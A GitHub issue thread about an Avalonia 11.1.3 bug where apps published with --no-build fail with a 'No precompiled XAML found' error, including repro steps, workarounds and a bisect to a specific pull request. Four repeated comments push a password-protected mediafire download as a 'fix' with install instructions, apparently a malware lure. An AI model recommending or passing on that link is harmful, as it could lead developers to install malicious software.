### ISSUE TITLE
After Update from 11.0 to 11.1.3 published app has runtime errors with double packed resources

### ISSUE THREAD

**Issue by peter-friedland-t2i** [AvaloniaUI/Avalonia#16838]
### Describe the bug

I have updated our avalonia application from 11.0.11 to 11.1.3. The application builds and runs properly from IDE or dotnet run. But if I publish the app  self contained for windows at runtime the following error occurs:

```
Avalonia.Markup.Xaml.XamlLoadException: No precompiled XAML found for HyperPlan.App2.App, make sure to specify x:Class and include your XAML file as AvaloniaResource
   at Avalonia.Markup.Xaml.AvaloniaXamlLoader.Load(Object obj)
   at HyperPlan.App2.App.Initialize() in C:\Users\peter.friedland\source\repos\HyperPlan-App\source\HyperPlan.App2\App.axaml.cs:line 11
   at Avalonia.AppBuilder.SetupUnsafe()
   at Avalonia.AppBuilder.Setup()
   at Avalonia.AppBuilder.SetupWithLifetime(IApplicationLifetime lifetime)
   at Avalonia.ClassicDesktopStyleApplicationLifetimeExtensions.StartWithClassicDesktopLifetime(AppBuilder builder, String[] args, Action`1 lifetimeBuilder)
   at HyperPlan.App2.Program.Main(String[] args) in C:\Users\peter.friedland\source\repos\HyperPlan-App\source\HyperPlan.App2\Program.cs:line 12
```

### To Reproduce

1. Create new project with `dotnet new avalonia.app -o MyApp`
2. Add `<SelfContained>true</SelfContained>` and `<RuntimeIdentifiers>win-x64</RuntimeIdentifiers>` to project file
3. go to MyApp folder and run:

``` 
$ dotnet build
$ dotnet publish --configuration Debug --no-restore --no-build --output .\Publish --self-contained True --runtime win-x64
``` 

4. Go to publish folder and start MyApp.exe

Won't start up, windows event log has an error with above mentioned exception

### Expected behavior

App starts as intended

### Avalonia version

11.1.3

### OS

Windows

### Additional context

Publish with removing the --no-build fixes the issue.

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kebox7** [comment]
Hi, @peter-friedland-t2i.

Try adding the following to your project file. Maybe it will help.
```xaml
<PropertyGroup>
  <AvaloniaIncludeApplicationIconAsWindowIcon>false</AvaloniaIncludeApplicationIconAsWindowIcon>
</PropertyGroup>
```

**Comment by peter-friedland-t2i** [comment]
> Hi, @peter-friedland-t2i.
> 
> Try adding the following to your project file. Maybe it will help.
> 
> ```
> <PropertyGroup>
>   <AvaloniaIncludeApplicationIconAsWindowIcon>false</AvaloniaIncludeApplicationIconAsWindowIcon>
> </PropertyGroup>
> ```

thank you for your help. I give it a try but I am not really sure that this will help guess you have been misslead by the name: Icons.axaml. its a resource dictionary containing geometrydrawings.

**Comment by kebox7** [comment]
> I am not really sure that this will help guess you have been misslead by the name:
Yes indeed, I was mistaken. I apologize. 😳

**Comment by peter-friedland-t2i** [comment]
I have some updates, I will add it in the description as well: when I create a new project outside of the solution it works., if I have the very same code in my existing solution the published app has the same problems. I am confused what outside of the project is responsible for that.

**Comment by peter-friedland-t2i** [comment]
I found the real problem: when publish is perform with the flag --no-build the error also occurs for an empty, newly created project. I update the description.

**Comment by heuristicAL** [comment]
FYI I suspect that whatever causes your issue, also causes mine: #16732

**Comment by gbiellem** [comment]
I hit the same problem. Thanks  @peter-friedland-t2i for the tip about --no-build causing it.

**Comment by gbtb** [comment]
Hi. 
We also got hit by the same issue in https://github.com/NixOS/nixpkgs/pull/331150 . Nixpkgs buildDotnetModule function separately calls dotnet build and then dotnet publish with --no-build flag. During our debug journey, I bisected Avalonia to the exact commit that breaks the build - https://github.com/AvaloniaUI/Avalonia/pull/13840 . 
We'd like to know Avalonia devs opinion on that matter - can we hope for a quick fix or should we adopt changes and remove --no-build flag? Or maybe @TomEdwardsEnscape as an author of this change can provide another workaround?
